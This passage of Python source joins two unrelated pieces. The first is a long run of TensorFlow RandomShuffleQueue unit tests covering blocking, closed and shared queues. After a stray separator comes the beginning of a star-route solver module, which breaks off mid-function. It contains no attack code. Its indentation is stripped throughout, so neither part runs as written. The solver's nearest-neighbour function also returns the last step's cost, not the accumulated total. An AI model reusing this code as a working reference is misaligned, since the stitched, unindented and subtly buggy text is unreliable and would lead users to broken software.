for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(
10, 0, (tf.int32, tf.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = sess.run(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 5, tf.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 0, tf.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], size.eval())
dequeued_t.op.run()
self.assertEqual([0], size.eval())
def testEnqueueMany(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 0, tf.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 5, tf.float32)
empty_t = tf.constant([], dtype=tf.float32,
shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, size_t.eval())
enqueue_op.run()
self.assertEqual(0, size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 0, tf.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 0, tf.float32)
enqueue_op = q.enqueue(
(tf.constant([10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"requires the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# Unlike tf.Queue, RandomShuffleQueue does not make any
# attempt to support DequeueMany with unspecified shapes, even if
# a shape could be inferred from the elements enqueued.
with self.assertRaisesOpError(
"requires the components to have specified shapes"):
dequeued_t.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(
10, 0, (tf.float32, tf.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = sess.run(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = zip(float_elems, int_elems) + zip(float_elems, int_elems)
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 0, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(
10, 0, (tf.float32, tf.int32),
shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.test_session():
q = tf.RandomShuffleQueue(
10, 0, tf.int32, ((4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(1000, 0, tf.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(1000, 0, tf.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(10, 0, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = tf.RandomShuffleQueue(100, 0, tf.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = tf.RandomShuffleQueue(
total_count, 0, tf.int32, ((),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 2, tf.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(10, 2, tf.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
def dequeue():
for _ in elems:
results.append(sess.run(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(10, 0, tf.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(10, 0, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, sess.run(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1: break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(10, 0, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
# However, the last result was dequeued before the queue was closed,
# so nothing more is added to results.
results.extend(sess.run(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 3)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 3)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(10, 5, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 4, tf.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 5, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(4, 0, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(4, 0, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
def testBlockingEnqueueToClosedQueue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(4, 0, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
sess.run(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(4, 0, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
sess.run(blocking_enqueue_op)
# At this point the close operation will become unblocked, so the
# next enqueue will fail.
with self.assertRaisesRegexp(tf.errors.AbortedError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeue.
self.assertEqual(size_t.eval(), 4)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# The close_op should run before the second blocking_enqueue_op
# has started.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
def testSharedQueueSameSession(self):
with self.test_session():
q1 = tf.RandomShuffleQueue(
1, 0, tf.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
q2 = tf.RandomShuffleQueue(
1, 0, tf.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = tf.RandomShuffleQueue(
10, 5, tf.float32, shared_name="q_a")
q_a_2 = tf.RandomShuffleQueue(
15, 5, tf.float32, shared_name="q_a")
q_a_1.queue_ref.eval()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.eval()
q_b_1 = tf.RandomShuffleQueue(
10, 0, tf.float32, shared_name="q_b")
q_b_2 = tf.RandomShuffleQueue(
10, 5, tf.float32, shared_name="q_b")
q_b_1.queue_ref.eval()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.eval()
q_c_1 = tf.RandomShuffleQueue(
10, 5, tf.float32, shared_name="q_c")
q_c_2 = tf.RandomShuffleQueue(
10, 5, tf.int32, shared_name="q_c")
q_c_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.eval()
q_d_1 = tf.RandomShuffleQueue(
10, 5, tf.float32, shared_name="q_d")
q_d_2 = tf.RandomShuffleQueue(
10, 5, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.eval()
q_e_1 = tf.RandomShuffleQueue(
10, 5, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = tf.RandomShuffleQueue(
10, 5, tf.float32, shared_name="q_e")
q_e_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.eval()
q_f_1 = tf.RandomShuffleQueue(
10, 5, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = tf.RandomShuffleQueue(
10, 5, tf.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.eval()
q_g_1 = tf.RandomShuffleQueue(
10, 5, tf.float32, shared_name="q_g")
q_g_2 = tf.RandomShuffleQueue(
10, 5, (tf.float32, tf.int32), shared_name="q_g")
q_g_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.eval()
q_h_1 = tf.RandomShuffleQueue(
10, 5, tf.float32, seed=12, shared_name="q_h")
q_h_2 = tf.RandomShuffleQueue(
10, 5, tf.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.eval()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.eval()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
tf.RandomShuffleQueue(10, 0, tf.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = tf.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = tf.RandomShuffleQueue(10, 0, tf.float32)
q2 = tf.RandomShuffleQueue(15, 0, tf.float32)
enq_q = tf.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("Index must be in the range"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("Dequeue operation was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("Dequeue operation was cancelled"):
sess.run(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("Enqueue operation was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("Enqueue operation was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = tf.RandomShuffleQueue(
5, 0, tf.float32, ((),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
q_full = tf.RandomShuffleQueue(5, 0, tf.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(self._blockingDequeueMany, args=(sess,
dequeue_many_op)),
self.checkedThread(self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(self._blockingEnqueueMany, args=(sess,
enqueue_many_op))]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = tf.RandomShuffleQueue(10, 5, tf.int32,
((),), seed=1729)
q2 = tf.RandomShuffleQueue(10, 5, tf.int32,
((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = tf.RandomShuffleQueue(10, 5, tf.int32,
((),), seed=1729)
q2 = tf.RandomShuffleQueue(10, 5, tf.int32,
((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(
5, 0, tf.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(2, 0, tf.int32, ((),))
elem = range(4)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
tf.test.main()
| |
import logging
import math
import random
import sys
import vector3
log = logging.getLogger("solver")
max_single_solve_size = 12
cluster_size_max = 8
cluster_size_min = 1
cluster_divisor = 10
cluster_iteration_limit = 50
cluster_repeat_limit = 100
cluster_route_search_limit = 4
supercluster_size_max = 8
CLUSTERED = "clustered"
CLUSTERED_REPEAT = "clustered-repeat"
BASIC = "basic"
NEAREST_NEIGHBOUR = "nearest-neighbour"
modes = [CLUSTERED, CLUSTERED_REPEAT, BASIC, NEAREST_NEIGHBOUR]
class _Cluster(object):
def __init__(self, objs, mean):
self.position = mean
self.systems = objs
@property
def is_supercluster(self):
return any(isinstance(s, _Cluster) for s in self.systems)
def get_closest(self, target):
best = None
bestdist = sys.float_info.max
for s in self.systems:
if isinstance(s, _Cluster) and s.is_supercluster:
newsys, newdist = s.get_closest(target)
if newdist < bestdist:
best = newsys
bestdist = newdist
else:
newdist = (s.position - target.position).length
if newdist < bestdist:
best = s
bestdist = newdist
return best, bestdist
def __repr__(self):
return "Cluster(size={}, pos={})".format(len(self.systems), self.position)
class Solver(object):
def __init__(self, calc, route, jump_range, diff_limit):
self._calc = calc
self._route = route
self._diff_limit = diff_limit
self._jump_range = jump_range
def solve(self, stations, start, end, maxstops, preferred_mode = CLUSTERED):
log.debug("Solving set using preferred mode '{}'".format(preferred_mode))
if preferred_mode == CLUSTERED_REPEAT and len(stations) > max_single_solve_size:
return self.solve_clustered_repeat(stations, start, end, maxstops), False
if preferred_mode == CLUSTERED and len(stations) > max_single_solve_size:
return self.solve_clustered(stations, start, end, maxstops), False
elif preferred_mode in [CLUSTERED, BASIC]:
return self.solve_basic(stations, start, end, maxstops), True
elif preferred_mode == NEAREST_NEIGHBOUR:
return self.solve_nearest_neighbour(stations, start, end, maxstops), True
else:
raise ValueError("invalid preferred_mode flag passed to solve")
def solve_basic(self, stations, start, end, maxstops):
result, _ = self.solve_basic_with_cost(stations, start, end, maxstops)
return result
def solve_basic_with_cost(self, stations, start, end, maxstops):
if not any(stations):
if start == end:
return [start], 0.0
else:
return [start, end], self._calc.solve_cost(start, end, 0)
log.debug("Calculating viable routes...")
vr = self._get_viable_routes([start], stations, end, maxstops)
log.debug("Viable routes: {0}".format(len(vr)))
count = 0
costs = []
mincost = None
minroute = None
for route in vr:
count += 1
cost_normal = self._calc.solve_route_cost(route)
route_reversed = [route[0]] + list(reversed(route[1:-1])) + [route[-1]]
cost_reversed = self._calc.solve_route_cost(route_reversed)
cost = cost_normal if (cost_normal <= cost_reversed) else cost_reversed
route = route if (cost_normal <= cost_reversed) else route_reversed
costs.append(cost)
if mincost is None or cost < mincost:
log.debug("New minimum cost: {0} on route {1}".format(cost, count))
mincost = cost
minroute = route
return minroute, mincost
def solve_nearest_neighbour(self, stations, start, end, maxstops):
result, _ = self.solve_nearest_neighbour_with_cost(stations, start, end, maxstops)
return result
def solve_nearest_neighbour_with_cost(self, stations, start, end, maxstops):
route = [start]
full_cost = 0
remaining = stations
while any(remaining) and len(route)+1 < maxstops:
cur_cost = sys.maxsize
cur_stop = None
for s in remaining:
cost = self._calc.solve_cost(route[-1], s, len(route)-1)
if cost < cur_cost:
cur_stop = s
cur_cost = cost
if cur_stop is not None:
route.append(cur_stop)
remaining.remove(cur_stop)
full_cost += cur_cost
route.append(end)
return route, cur_cost
def solve_clustered(self, stations, start, end, maxstops):
result, _ = self.solve_clustered_with_cost(stations, start, end, maxstops)
return result
def solve_clustered_with_cost(self, stations, start, end, maxstops):
cluster_count = int(math.ceil(float(len(stations) + 2) / cluster_divisor))
